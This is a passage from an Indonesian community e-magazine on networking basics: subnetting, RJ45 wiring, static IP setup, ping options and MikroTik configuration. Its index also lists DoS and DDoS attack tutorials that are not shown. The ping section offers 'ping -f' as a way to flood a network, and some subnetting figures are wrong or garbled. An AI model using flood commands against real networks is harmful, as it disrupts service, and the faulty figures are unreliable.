SlideShare a Scribd company logo
1 of 70
Download to read offline
1e-ZIT #Vol 2 - Networking
2e-ZIT #Vol 2 - Networking
Introduce
History
ZONA IT TERNATE atau di singkat dengan ZIT, berdiri pada tanggal 18 Februari 2012 adalah
suatu komunitas yang peduli akan perkembangan ilmu pengetahuan teknologi yang di buka
secara umum baik untuk mahasiswa, pelajar maupun masyaratakat umum lainya, guna
mengembangkan ilmu teknologi dan informasi dan sebagai media perkumpulan sesama
pecinta IT.
Visi
“Menjadi komunitas yang komunikatif, informatif, kreatif, humanis dan berkualitas di
tingkat Provinsi dan Nasional “
Misi
 Menciptakan, menerapkan dan mengembangkan teknologi informasi yang berdaya
guna dan berhasil guna bagi masyarakat.
 Mendayakan tiap komponen yang ada untuk menguasai ilmu pengetahuan dan
teknologi untuk memberikan yang terbaik bagi perkembangannya.
 Mewujudkan sebuah wahana pengembangan ilmu pengetahuan dan teknologi diluar
naungan kampus maupun sekolah
 Menbentuk Keluarga Besar Pecinta IT Khususnya di Ternate dan Maluku Utara pada
umumnya.
 Menciptakan Komunitas yang memiliki jiwa kewirausahaan dan Berdaya saing
Motto
Learn, Explore, Action, Share
3e-ZIT #Vol 2 - Networking
Kata Pengantar
Puji syukur kami panjatkan ke hadirat Tuhan YME karena kasih setia dan
pertolonganNya hingga kami dapat menyelesaikan buku ini walaupun agak
lama jarak terbitnya dari e-ZIT Vol pertama.
Di e-ZIT Vol 2 ini kami membahas mengenai Networking dan apa saja yang
terkait di dalamnya, mulai dari langkah-langkah awal untuk menjadi seorang
networker, basic networking dan beberapa tips n tricks yang juga masih di
seputar dunia netrworking.
Semoga di e-ZIT Vol 2 ini dapat membantu, dan menambah pengetahuan
teman-teman mengenai dunia Netwroking. Dan kami mohon maaf apabila
terdapat banyak kekurangan di e-ZIT vol 2 ini.
Semua yang tercantum di dalam e-ZIT ini adalah hasil experiment, searching di
internet dan Thread di forum codernate.
Akhir kata, kami sampaikan terimakasih kepada semua pihak yang telah
berperan dalam penyusunan e-ZIT ini dari awal sampai akhir.
Selamat membaca…
Salam
Team Readksi & All Staff Zona IT Ternate
4e-ZIT #Vol 2 - Networking
Index
 Apa Tujuanmu Menjadi Seorang Networker/SysAdmin ? Apa Yang Harus
Saya Pelajari ? #5
 Cara Cepat Mengitung IP Address & Subnetting #7
 Cara Konfigurasi RJ45 [Pengkabelan] #12
 Setting IP Static di Backtrack/Ubuntu #17
 Beragam Tips Perintah Ping #20
 Mikrotik > Memberi Nama, Merubah Nama Interface, Setting IP Address
dan NAT #22
 Mikrotik > Management Bandwith Berdasarkan Extensi #24
 Mikrotik > Cara Sederhana Membuat Hotspot #32
 Mikrotik > Pisah Download, Browse & Game di 1 Line #33
 Mikrotik > Leases Static DHCP #36
 Network Scanning With NMAP #37
 Security > Setting Mac Filtering Pada AP TP-LINK TL-WA610G #40
 Security > Mencegah Serangan Ping Flooding Dengan Iptables #46
 Security > Mencegah Serangan ARP, DNS/DHCP Spoofing & SSLstrip #48
 Security > Apa Itu Honeypot ? #50
 Network Attack > DoS Attack With Metasploit #57
 Network Attack > POC Samsung Smart TV Denial of Service (DoS) Attack
#62
 Network Attack > How To Use Xerxes DDoS Tools #65
 ZIT Product & Info #67
- Codernate Linux 1.4 (Dodorobe) Released!!!
 Credits #69
- Cara Kirim Artikel Di e-ZIT edisi berikutnya
- Redaksi
- Grets
 Home Page #70
5e-ZIT #Vol 2 - Networking
Apa Tujuanmu Menjadi Seorang Networker/SysAdmin ? Apa Yang Harus
Saya Pelajari ?
Yups, akhirnya setelah 2 bulan vacum, ketemu lagi deh sama e-ZIT Vol 2, hehehe
Nah, karena di Vol 2 temanya mengenai Networking, kali ini e-ZIT mau berbagi sedikit tips
seputar Kaka-kaka yang pengen menggeluti dunia Networking,, iya Networking, iya bener,
#halah okeh lanjut..
Bagi kaka-kaka yang bercita-cita menjadi seorang SysAdmin a.k.a Networker atau pengen
mengenal lebih dalam, lebih dekat, lebih, jauh dan lebih-lebih lainnya mengenai dunia
Networking, pasti akan berpikir, kira-kira Saya harus mulai dari mana dulu yah ? atau
mungkin bertanya-tanya, apa yang harus Saya pelajari duluan yah? Dan masih banyak
pertanyaan-pertanyaan lainnya..
Nah disini e-ZIT mau bagi sedikit tips neh, yang telah e-ZIT rangkum dari hasil wawancara
dengan teman-teman ZIT, googling dan maen-maen di forum tetangga,,, hehehe
Yups, tho the point saja,,, neh :
1. Basic IP dan Subnetting
Mungkin kalau bisa dibilang yang sangat penting dari semua-nya adalah IP dan
subnetting. Hal ini akan sangat terasa apabila Anda bekerja di ISP. Anda akan
mempelajari cara efisiensi IP,apa itu gateway? Bagaimana mengatur IP yang baik, dll
2. Basic Hardware Networking
Kenapa mesti dipelajari?? Karena dari sinilah inti perjalanan packet yang akan dikirim
dari komputer kita ke Server. Apa itu Switch, Hub, Wireless. Taukah Anda bahwa switch
lebih aman daripada WIFI?? Kapan saya menggunakan switch atau Wifi. Semua harus
diperhitungkan dengan baik. Darimana kita belajar? Banyak buku yang mempelajari hal
tersebut
3. Technology Switching dan Routing
Kalau Anda sudah melebihi 1 jaringan di kantor Anda harus bisa melakukan routing
terhadap jaringan. Tau tidak bahwa internet bisa terhubung ke mana-mana karena
routing ini. Untuk switching Anda perlu mempelajari Teknologi VLAN dll.
4. Linux
Loh, loh, loh, linux lagi, linux lagi, kenapa mesti linux ? kenapa nggak windows saja ?
6e-ZIT #Vol 2 - Networking
Hahaha, yah begitulah, disamping Linux lebih stabil untuk Networking, kebanyakan OS
server-server yang di pakai sekarang yah Linux, karena Linux emang cocok untuk
Networking, lebih aman dari windows juga dan masih banyak manfaat dan kelebihan
Linux untuk keperluan lainnya, bisa di bilang anak Networking, seorang SysAdmin atau
Networker itu harus familiar sama OS yang satu ini…
5. Technology Server
Kalau yang satu ini Anda akan banyak berhubungan dengan Server LDAP, DHCP, DNS, Dll.
Intinya adalah memberikan service yang dibutuhkan untuk client. Untuk mencari
informasi silahkan minta bantuan Google. Ketikkan service server yang ingin dipelajari
6. Security
Nah setelah terbentuk server dan infrastruktur yang baik barulah Anda memperhatikan
Security mulai dari Server, Router, sampai Anda membuat IDS untuk mendeteksi
serangan
7. Monitoring
Monitoring ini mencangkup semua hal baik dari infrastruktur maupun dari sisi Server.
Semakin baik monitoring maka Anda akan mudah..
8. Backup
Hal ini sering dilupakan oleh para Network Administrator. Lakukan Backup Deferensial
maupun Full untuk mengantisipasi Crash. Banyak teknologi yang dilakukan. Kalau saya
lebih sering menggunakan RAID untuk Backup Harddisk dan Rsync untuk FIle
Darimana Kaka bisa mempelajari hal-hal tersebut:
1. Dari Google yang pasti nya
2. Buku atau Ebook
3. Tutorial
4. Forum
5. Pengalaman dan TroubleShooting terhadap suatu masalah
Yarp, mungkin itu saja sedikit tips yang bias e-ZIT berikan di kesempatan kali ini, apabila
teman-teman punya saran yang lainnya jangan lupa di share juga yah
./regards
e-ZIT
7e-ZIT #Vol 2 - Networking
Cara Cepat Mengitung IP Address & Subnetting
IP Address merupakan alat yang digunakan agar paket data dapat mencapai tujuan. Di
dalam Jaringan, pengiriman suatu paket data membutuhkan alamat sebagai identitas suatu
Data akan dikirimkan (Destination Address) dan berasal (Source Address).
Agar unik setiap computer yang terkoneksi ke Internet diberi alamat yang berbeda. Alamat
ini supaya seragam seluruh dunia maka pemberian alamat IP address diseluruh dunia
diberikan oleh badan internasional Internet Assigned Number Authority (IANA), dimana
IANA hanya memberikan IP address Network ID nya saja sedangkan host ID diatur oleh
pemilik IP address tersebut. Contoh IP address untuk cisco.com adalah 202.93.35.9 untuk
http://www.ilkom.unsri.ac.id dengan IP nya 202.39.35.9
http://www.freeimagehosting.net/nptte
Ip address dibagi menjadi 2 bagian yaitu Network ID dan Host ID, Network ID yang akan
menentukan alamat dalam jaringan (network address), sedangkan Host ID menentukan
alamat dari peralatan jaringan yang sifatnya unik untuk membedakan antara satu mesin
dengan mesin lainnya. Ibaratkan Network ID Nomor jalan dan alamat jalan sedangkan Host
ID adalah nomor rumahnya.
IP address dibagi menjadi kelas yaitu ;
1. Kelas A ( 1-126)
2. Kelas B ( 128 – 192)
3. Kelas C ( 192 – 223)
4. Kelas D (224 – 239)
5. Kelas E (240 – 255)
IP Address Private & Public
Jumlah IP Address sangat terbatas, apalagi jika harus memberikan alamat semua host di
Jaringan Local Area Network (LAN). Sehingga perlu dilakukan efisiensi dalam penggunaan IP
Address. Konsep subnetting IP Address merupakan teknik yang umum digunakan di Jaringan
Internet untuk efisiensi alokasi IP Address dalam sebuah jaringan. Selain Konsep Subnetting,
cara lain adalah dengan mengalokasikan beberapa IP Address khusus yang digunakan untuk
lingkungan LAN dikenal dengan IP Private. Sedangkan IP Address yang dapat dikenal di
Internet dikenal dengan IP Public.
IP Private antara lain adalah :
ß Class A: 10.0.0.0/8
ß Class B: 172.16.0.0/16 s/d 172.31.0.0/15
ß Class C: 192.168.0.0/24 s/d 192.168.255.0/24
8e-ZIT #Vol 2 - Networking
Penghitungan Subnetting
Pada hakekatnya semua pertanyaan tentang subnetting akan berkisar di empat masalah:
Jumlah Subnet, Jumlah Host per Subnet, Blok Subnet, dan Alamat Host- Broadcast.
Penulisan IP address umumnya adalah dengan 192.168.1.2. Namun adakalanya ditulis
dengan 192.168.1.2/24, apa ini artinya? Artinya bahwa IP address 192.168.1.2 dengan
subnet mask 255.255.255.0. Lho kok bisa seperti itu? Ya, /24 diambil dari penghitungan
bahwa 24 bit subnet mask diselubung dengan binari 1. Atau dengan kata lain, subnet
masknya adalah: 11111111.11111111.11111111.00000000 (255.255.255.0). Konsep ini yang
disebut dengan CIDR (Classless Inter-Domain Routing) yang diperkenalkan pertama kali
tahun 1992 oleh IEFT.
http://www.freeimagehosting.net/tovgc
SUBNETTING PADA IP ADDRESS CLASS C
Ok, sekarang mari langsung latihan saja. Subnetting seperti apa yang terjadi dengan sebuah
NETWORK ADDRESS 192.168.1.0/26 ?
Analisa: 192.168.1.0 berarti kelas C dengan Subnet Mask /26 berarti
11111111.11111111.11111111.11000000 (255.255.255.192).
Penghitungan: Seperti sudah saya sebutkan sebelumnya semua pertanyaan tentang
subnetting akan berpusat di 4 hal, jumlah subnet, jumlah host per subnet, blok subnet,
alamat host dan broadcast yang valid. Jadi kita selesaikan dengan urutan seperti itu:
1. Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada oktet terakhir subnet
mask (2 oktet terakhir untuk kelas B, dan 3 oktet terakhir untuk kelas A). Jadi Jumlah
Subnet adalah 22 = 4 subnet
2. Jumlah Host per Subnet = 2y - 2, dimana y adalah adalah kebalikan dari x yaitu
banyaknya binari 0 pada oktet terakhir subnet. Jadi jumlah host per subnet adalah
26 - 2 = 62 host
3. Blok Subnet = 256 - 192 (nilai oktet terakhir subnet mask) = 64. Subnet berikutnya
adalah 64 + 64 = 128, dan 128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128,
192.
4. Bagaimana dengan alamat host dan broadcast yang valid? Kita langsung buat
tabelnya. Sebagai catatan, host pertama adalah 1 angka setelah subnet, dan
broadcast adalah 1 angka sebelum subnet berikutnya.
http://www.freeimagehosting.net/jgix4
9e-ZIT #Vol 2 - Networking
SUBNETTING PADA IP ADDRESS CLASS B
Berikutnya kita akan mencoba melakukan subnetting untuk IP address class B. Pertama,
subnet mask yang bisa digunakan untuk subnetting class B adalah seperti dibawah. Sengaja
saya pisahkan jadi dua, blok sebelah kiri dan kanan karena masing-masing berbeda teknik
terutama untuk oktet yang “dimainkan” berdasarkan blok subnetnya. CIDR /17 sampai /24
caranya sama persis dengan subnetting Class C, hanya blok subnetnya kita masukkan
langsung ke oktet ketiga, bukan seperti Class C yang “dimainkan” di oktet keempat.
Sedangkan CIDR /25 sampai /30 (kelipatan) blok subnet kita “mainkan” di oktet keempat,
tapi setelah selesai oktet ketiga berjalan maju (coeunter) dari 0, 1, 2, 3, dst.
http://www.freeimagehosting.net/wyove
Ok, kita coba dua soal untuk kedua teknik subnetting untuk Class B. Kita mulai dari yang
menggunakan subnetmask dengan CIDR /17 sampai /24. Contoh network address
172.16.0.0/18.
Analisa: 172.16.0.0 berarti kelas B, dengan Subnet Mask /18 berarti
11111111.11111111.11000000.00000000 (255.255.192.0).
Penghitungan:
1. Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada 2 oktet terakhir. Jadi
Jumlah Subnet adalah 22 = 4 subnet
2. Jumlah Host per Subnet = 2y - 2, dimana y adalah adalah kebalikan dari x yaitu
banyaknya binari 0 pada 2 oktet terakhir. Jadi jumlah host per subnet adalah 214 - 2
= 16.382 host
3. Blok Subnet = 256 - 192 = 64. Subnet berikutnya adalah 64 + 64 = 128, dan
128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128, 192.
4. Alamat host dan broadcast yang valid?
http://www.freeimagehosting.net/t12dy
Berikutnya kita coba satu lagi untuk Class B khususnya untuk yang menggunakan
subnetmask CIDR /25 sampai /30. Contoh network address 172.16.0.0/25. Analisa:
172.16.0.0 berarti kelas B, dengan Subnet Mask /25 berarti
11111111.11111111.11111111.10000000 (255.255.255.128).
Penghitungan:
1. Jumlah Subnet = 29 = 512 subnet
2. Jumlah Host per Subnet = 27 - 2 = 126 host
3. Blok Subnet = 256 - 128 = 128. Jadi lengkapnya adalah (0, 128)
4. Alamat host dan broadcast yang valid?
http://www.freeimagehosting.net/sa19j
10e-ZIT #Vol 2 - Networking
SUBNETTING PADA IP ADDRESS CLASS A
Kalau sudah mantab dan paham, kita lanjut ke Class A. Konsepnya semua sama saja.
Perbedaannya adalah di OKTET mana kita mainkan blok subnet. Kalau Class C di oktet ke 4
(terakhir), kelas B di Oktet 3 dan 4 (2 oktet terakhir), kalau Class A di oktet 2, 3 dan 4 (3
oktet terakhir). Kemudian subnet mask yang bisa digunakan untuk subnetting class A adalah
semua subnet mask dari CIDR /8 sampai /30.
Kita coba latihan untuk network address 10.0.0.0/16.
Analisa: 10.0.0.0 berarti kelas A, dengan Subnet Mask /16 berarti
11111111.11111111.00000000.00000000 (255.255.0.0).
Penghitungan:
1. Jumlah Subnet = 28 = 256 subnet
2. Jumlah Host per Subnet = 216 - 2 = 65534 host
3. Blok Subnet = 256 - 255 = 1. Jadi subnet lengkapnya: 0,1,2,3,4, etc.
4. Alamat host dan broadcast yang valid?
http://www.freeimagehosting.net/c6pj3
Catatan: Semua penghitungan subnet diatas berasumsikan bahwa IP Subnet-Zeroes (dan IP
Subnet-Ones) dihitung secara default. Buku versi terbaru Todd Lamle dan juga CCNA setelah
2005 sudah mengakomodasi masalah IP Subnet-Zeroes (dan IP Subnet-Ones) ini. CCNA pre-
2005 tidak memasukkannya secara default (meskipun di kenyataan kita bisa
mengaktifkannya dengan command ip subnet-zeroes), sehingga mungkin dalam beberapa
buku tentang CCNA serta soal-soal test CNAP, anda masih menemukan rumus penghitungan
Jumlah Subnet = 2x – 2
Tujuan Subnetting:
ß Menghemat penggunaan IP Public.
ß Mengurangi tingkat kongesti (kemacetan) komunikasi data didalam Jaringan.
ß Mengatasi perbedaan hardware dan media fisik yang digunakan dalam suatu network.
ß Memecah Broadcast Domain.
Proses subnetting adalah “memindahkan” atau menggeser garis pemisah antara bagian
network dan bagian host darisuatu IP Address.
11e-ZIT #Vol 2 - Networking
Beberapa bit dari bagian host-ID dialokasikan menjadi bit tambahan pada bagian network-
ID. Network Address pada satu Jaringan Tunggal dipecah menjadi beberapa subnetwork.
Proses Subnetting dapat membuat sejumlah network tambahan dengan mengurangi jumlah
maksimum host yang ada dalam tiap network tersebut.....
Semoga bermanfaat ya..... :)
ket : tabel subnetting >> http://4.bp.blogspot.com/_rQYEfq496fE/TM...ting_c.png
special thank : http://bakirmuhammad2711.blogspot.com/
./regards
shockw4v3
12e-ZIT #Vol 2 - Networking
Cara Konfigurasi RJ45 [Pengkabelan]
Assalamuallaikum wr...wb
Hallo sahabatku. Ini mungkin artikel pertama saya di forum.codernate.org. basic sih, tapi
apa salahnya di share… wkwkwk
Nah kali ini saya akan share tentang cara konfigurasi kabel RJ 45. Sedikit cerita tentang
pengalaman saya, ceritanya waktu itu lagi dapat tugas kampus. Tugasnya tentang cara
membuat dan mengenali kabel RJ45 tersebut, dan saya yang notabenenya masih newbie
didunia IT, masih kebingungan membedakan susunan alias cara konfigurasi kabel tersebut..
OK ini OOT..
Sedikit penjelasan, Berdasarkan media transmisi, dalam jaringan terbagi menjadi 2, yaitu:
Jaringan berkabel ( wired Network )
Jaringan Nirkabel ( wirelles Network )
Dan menurut pengalaman dan yang saya tau, dalam media transmisi jaringan dalam hal ini
pada kabelnya, ada terdapat 3 buah kabel sebgai medianya, yaitu:
1. Fiber optik ( FO )
2. Coaxial
3. RJ45
Tentunya para sahabat” yang sudah berkecimpung di dunia IT sudah pada paham kan
tentang Transmisi yang saya sisipkan di atas dan pengertianya serta perkembangannya,,,
Ok langsung saja kita kembali ke topik permasalahan yaitu dimana kita akan membahas
tentang RJ 45.
Yang saya mau bahas kali ini mengenai kabel RJ 45 sedikit gambaran tentang pemahaman
kabel RJ 45 tersebut yaitu memiliki 8 pin dan ke delapan pin tersebut sudah mempunyai
tugas tersendiri yang di rinci atau di bagi 2 yaitu empat nya untuk data dan empatnya lagi
untuk daya, antara lain yaitu :
1236 > Untuk Data
4578 > Untuk Daya
13e-ZIT #Vol 2 - Networking
Nah masih bingung ya,,ok langsung saja pada poin di bawah ini...!!!
#Stright
Susunan Stright
Titik A Titik B
Putih orange > Putih orange
Orange > Orange
Putih hijau > Putih hijau
Biru > Biru
Putih biru > Putih biru
Hijau > Hijau
Putih coklat > Putih coklat
Coklat > Coklat
Nah seperti yang teman-teman lihat pada gambar di atas, susunan kabel pada pin yang
tertancap di konektor sudah sesuai dengan warna-warna yang telah ditetapkan tadi. Nah
tipe diatas ialah tipe straight, dimana susunan warna kabel pada titik A dan titik B tetap
sama posisi dan letaknya. hehehhee masih bingung ya...!!!
14e-ZIT #Vol 2 - Networking
Ok saya akan contohkan seperti gambar berikut ini
Semoga pada tahap ini sobat sudah mulai paham…
15e-ZIT #Vol 2 - Networking
#Cross
Susunan Cross
Titik A Titik B
Putih orange > Putih Hijau
Orange > Hijau
Putih hijau > Putih Orange
Biru > Biru
Putih biru > Putih biru
Hijau > Orange
Putih coklat > Putih coklat
Coklat > Coklat
Nah ini nih yang mereka sebut susunan cross, dimana susunan warna kabel pada Titik A dan
Titik B sudah berbeda satu sama lain, dan bagian yang diwarnai itu [Titik B] adalah pada
ujung kabel yang satunya, jika pada stright, susunan warna kedua kabel sama posisinya, nah
pada cross ujung yang satunya seperti stright sedangkan yang satunya lagi susunannya
seperti keterangan diatas.. kira-kira begitu cara konfigurasi susunan kabel RJ45 yang saya
ketahui.
16e-ZIT #Vol 2 - Networking
Sekian. mungkin itu saja sedikit pengalaman saya tentang konfigurasi RJ45. Maaf jika masih
terdapat banyak kekurangan atau kesalahan pada artikel saya…
Wasallam.
Thank’s buat yang sudah baca atau ikut petunjuk saya,,,!!!
./Regards
Surtua
17e-ZIT #Vol 2 - Networking
Setting IP Static di Backtrack/Ubuntu
Salam Backtrackers Bifi Ada Lagi, kali ini ane mw share cara setting ip static di
backtrack/ubuntu.. letz rock
Cara Pertama
Open Terminal Lalu Ketik comand ini
Code:
nano /etc/network/interfaces
Nah setelah nano editor terbuka maka akan
muncul kayak gini
Code:
auto lo
iface lo inet loopback
-------------------------------------
auto eth0
iface eth0 inet dhcp
address
network < edit di bagian ini
broadcast
netmask
gateway
-------------------------------------
auto ath0
iface ath0 inet dhcp
auto wlan0
iface wlan0 inet dhcp
disitu ada beberapa interfaces seperti eth1,eth2,eth0 dll
lalu cari interface eth0
kemudian ganti iface eth0 inet dhcp menjadi static
masukan address, network, broadcast, netmask n gateway
contoh aja
Code:
auto eth0
iface eth0 inet static
address 10.20.30.2
network 10.20.30.0
broadcast 10.20.30.7
netmask 255.255.255.248
gateway 10.20.30.2
18e-ZIT #Vol 2 - Networking
setelah itu di ctrl+x untuk save..
Jangan lupa setting dnsnya di sini
Code:
nano /etc/resolv.conf
ntar di nano editornya ketik saja dns
kali ini ane make mbah gugel
kayak gini
Code:
nameserver 8.8.8.8
nameserver 8.8.4.4
19e-ZIT #Vol 2 - Networking
Cara Kedua
Masih Di Terminal
ketik comand berikut secara bertahap
Code:
root@bt~# ifconfig eth0 10.20.30.2/24
root@bt~# route add default gw 10.20.30.2
root@bt~# echo nameserver 8.8.8.8 > /etc/resolv.conf
Lalu restart interfacenya
Code:
/etc/init.d/networking restart
nah kalo udah di restart networknya
ketik ifconfig untuk mngecek apakah ipnya berubah seperti yang di setting tadi ataw tidak...
Kalo Belum berubah, silahkan di ulangi langkah di atas....
nb :
ketik saja comand berikut
Code:
update-rc.d networking defaults
agar settingannya dapat terload ketika terestart...
setelah itu restart backtrack anda..
untuk lebih detail tentang apa itu address, network, broadcast, netmask n gateway, silahkan
tnya di gugel....
YUps, sekian tutor saya menganai setting ip static di backtrack/ubuntu...
next time ane share lagi tentang cara buat DNS Server...
Referensi > http://www.google.com
./regards
Bifi
20e-ZIT #Vol 2 - Networking
Beragam Tips Perintah Ping
Baris perintah ini sangat penting untuk kita gunakan. Apalagi jika menyangkut dengan
komunikasi antar jaringan,, ya inilah baris perintah ping. “Ping merupakan salah satu
program yang digunakan untuk mengecek komunikasi antar komputer dalam sebuah
jaringan melalui protocol TCP/IP”. ping akan mengirimkan internet control message protocol
(ICMP) Echo Request messages pada IP address komputer yang di tuju dan meminta respon
dari komputer tersebut. Jika komputer target memberikan respon, komputer tersebut
memberikan informasi seperti contoh hasil ping report dibawah ini :
Beragam Tips Perintah Ping :
1. Menambah/mengurangi interval waktu antara paket.
Secara default, ping menunggu 1 detik sebelum mengirim paket berikutnya. denagan opsi -i,
anda dapat menambah atau mengurangi interval tersebut
contoh : tungu 5 detik sebelum mengirim paket berikutnya dan tunggu 0,1 detik sebelum
mengirim paket berikutnya.
Code:
#ping -i 5 192.168.0.28
#ping -i 0.1 192.168.0.28
2. Periksa antarmuka jaringan lokal : Up dan Running.
Sebelum memesiksa apakah mesin peer terjangkau, cek dahulu apakah jaringan lokal adalah
Up dan Running menggunakan salah satu dari tiga metode berikut : Ping localhost
menggunakan nol (0), nama, dan IP address.
Code:
#ping 0
#ping localhost
#ping 127.0.0.1
3. Mengirim paket N dan STOP
Mengirim paket N ditentukan dengan opsi -c dan kemudian stop atau keluar secara
otomatis (tanpa harus menekan CTRL+C untuk keluar).
contoh : perintah ping mengirim 5 paketdan menunggu respon dari host tujuan. anda juga
dapat mengunakan opsi -w untuk menspesifikasikan batas waktu mengirim output ping.
Code:
#ping -c google.com
#ping -w 5 google.com
21e-ZIT #Vol 2 - Networking
4. Flood the Network
Superuser dapat mengirim seratusatau lebih paket per detik menggunakan opsi -f. ini
mencetak'.' ketika sebuah paket dikirimkan.
contoh : ping -f telah mengirimkan lebih dari 400.000 paket dalam beberapa detik.
Code:
#ping -f localhost
PING localhost.localadmin (127.0.0.1) 56(84) bytes of data. .^C 427412
packets transmitted, 427412 received,
ada yang mau tambahin perintah lain pada ping...
silahkan
spesial thanks : http://www.gudasi.com/
./regards
shockw4v3
22e-ZIT #Vol 2 - Networking
Mikrotik > Memberi Nama, Merubah Nama Interface, Setting IP Address
dan NAT
Akses mikrotik:
1. via console
Mikrotik router board ataupun PC dapat diakses langsung via console/ shell maupun remote
akses menggunakan putty.
2. via winbox
Mikrotik bisa juga diakses/remote menggunakan software tool winbox.
3. via web
Mikrotik juga dapat diakses via web/port 80 dengan menggunakan browser.
Memberi Nama Mikrotik
Code:
[admin@Feenx_O] > system identity print
name: "Mikrotik"
[ropix@Feenx_O] > system identity edit
value-name: name
masuk ke editor ketik misal saya ganti dengan nama Feenx_O:
Feenx_O
C-c quit C-o save&quit C-u undo C-k cut line C-y paste
Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor
Mengganti Nama Interface
Code:
[admin@Feenx_O] > /interface print
Flags: X - disabled, D - dynamic, R - running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[admin@Feenx_O] > /interface edit 0
value-name: name
Nilai 0 adalah nilai ether1, jika ingin mengganti ethet2 nilai 0 diganti dengan 1.
masuk ke editor ketik missal saya ganti dengan nama LAN:
LAN
C-c quit C-o save&quit C-u undo C-k cut line C-y paste
Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor
23e-ZIT #Vol 2 - Networking
Lakukan hal yang sama untuk interface ether 2, sehingga jika dilihat lagi akan muncul seperti
ini:
[admin@Feenx_O] > /interface print
Flags: X - disabled, D - dynamic, R - running
# NAME TYPE RX-RATE TX-RATE MTU
0 R LAN ether 0 0 1500
1 R Hotspot ether 0 0 1500
setting ip address
Code:
[admin@Feenx_O] > /ip address add
address: 192.168.1.1/24
interface: LAN
[admin@Feenx_O] > /ip address print
Flags: X - disabled, I - invalid, D - dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.254/24 192.168.0.0 192.168.0.255 LAN
Masukkan IP addres value pada kolom address beserta netmask, masukkan nama interface
yg ingin diberikan ip addressnya.Untuk Interface ke-2 yaitu interface hotspot, caranya sama
dengan diatas, sehingga jika dilihat lagi akan menjadi 2 interface:
[admin@Feenx_O] > /ip address print
Flags: X - disabled, I - invalid, D - dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.254/24 192.168.0.0 192.168.0.255 LAN
1 202.51.192.42/29 202.51.192.40 202.51.192.47 Hotspot
NAT
Code:
[admin@Feenx_O] > /ip firewall nat add chain=srcnat action=masquerade out-
interface=LAN
Catatan : dalam tutorial ini... saya mengakses mikrotik menggunakan winbox, dan membuat
settingan didalam mikrotik menggunakan fitur "new terminal" yang ada didalam winbox.
./regards
Feenx_O
24e-ZIT #Vol 2 - Networking
Mikrotik > Management Bandwith Berdasarkan Extensi
Ok waktunya ber experiment. Disini kita mencoba melimit bandwith berdasarkan extensi
Ok langsung saja, sory kalau tulisannya rada kacau
1. buat layer7 nya, sedikit tentang layer 7 ( layer aplication) Layer Application adalah
penghubung utama antara aplikasi yang berjalan pada satu komputer dan resources
network yang membutuhkan akses padanya. Layer Application adalah layer dimana
user akan beroperasi padanya, protocol seperti FTP, telnet, SMTP, HTTP, POP3
berada pada layer Application untuk pengaplikasiannya, pastekan sript dibawah ini
ke terminal mikrotik :
Code:
/ip firewall layer7-protocol add name=http-video
regexp="http/(0.9|1.0|1.1)[x09-x0d ][1-5][0-9][0-9][x09-x0d -
~]*(content-type: video)
/ip firewall layer7-protocol add comment="" name="Extension " .exe ""
regexp=".(exe)"
/ip firewall layer7-protocol add comment="" name="Extension " .rar ""
regexp=".(rar)"
/ip firewall layer7-protocol add comment="" name="Extension " .zip ""
regexp=".(zip)"
/ip firewall layer7-protocol add comment="" name="Extension " .7z ""
regexp=".(7z)"
/ip firewall layer7-protocol add comment="" name="Extension " .cab ""
regexp=".(cab)"
/ip firewall layer7-protocol add comment="" name="Extension " .asf ""
regexp=".(asf)"
/ip firewall layer7-protocol add comment="" name="Extension " .mov ""
regexp=".(mov)"
/ip firewall layer7-protocol add comment="" name="Extension " .wmv ""
regexp=".(wmv)"
/ip firewall layer7-protocol add comment="" name="Extension " .mpg ""
regexp=".(mpg)"
/ip firewall layer7-protocol add comment="" name="Extension " .mpeg ""
regexp=".(mpeg)"
/ip firewall layer7-protocol add comment="" name="Extension " .mkv ""
regexp=".(mkv)"
/ip firewall layer7-protocol add comment="" name="Extension " .avi ""
regexp=".(avi)"
/ip firewall layer7-protocol add comment="" name="Extension " .flv ""
regexp=".(flv)"
/ip firewall layer7-protocol add comment="" name="Extension " .wav ""
regexp=".(wav)"
/ip firewall layer7-protocol add comment="" name="Extension " .rm ""
regexp=".(rm)"
25e-ZIT #Vol 2 - Networking
/ip firewall layer7-protocol add comment="" name="Extension " .mp3 ""
regexp=".(mp3)"
/ip firewall layer7-protocol add comment="" name="Extension " .mp4 ""
regexp=".(mp4)"
/ip firewall layer7-protocol add comment="" name="Extension " .ram ""
regexp=".(ram)"
/ip firewall layer7-protocol add comment="" name="Extension " .rmvb ""
regexp=".(rmvb)"
/ip firewall layer7-protocol add comment="" name="Extension " .dat ""
regexp=".(dat)"
/ip firewall layer7-protocol add comment="" name="Extension " .daa ""
regexp=".(daa)"
/ip firewall layer7-protocol add comment="" name="Extension " .iso ""
regexp=".(iso)"
/ip firewall layer7-protocol add comment="" name="Extension " .nrg ""
regexp=".(nrg)"
/ip firewall layer7-protocol add comment="" name="Extension " .bin ""
regexp=".(bin)"
/ip firewall layer7-protocol add comment="" name="Extension " .vcd ""
regexp=.(vcd)"
2. setelah kita membuat layer7, selanjutnya kita membuat mangle. Ok sedikit tentang
apa itu mangle, Mangle adalah semacam 'penanda' yang menandai paket untuk
proses selanjutnya dengan tanda khusus. Seperti biasa, kita main copy paste lagi ^_^,
masuk ke terminal, selajutnya pastekan perintah dibawah ini.
Code:
ip firewall mangle add action=mark-packet chain=prerouting comment="http-
video mark-packet" disabled=no layer7-protocol=http-video new-packet-
mark=http-video passthrough=no
/ip firewall mangle add action=mark-connection chain=prerouting comment="7z
DOWNS" disabled=no layer7-protocol="Extension " .7z "" new-connection-
mark="7z DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="7z DOWNS" disabled=no new-packet-mark=7z passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="asf DOWNS" disabled=no layer7-protocol="Extension " .asf "" new-
connection-mark="asf DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="asf DOWNS" disabled=no new-packet-mark=asf passthrough=no
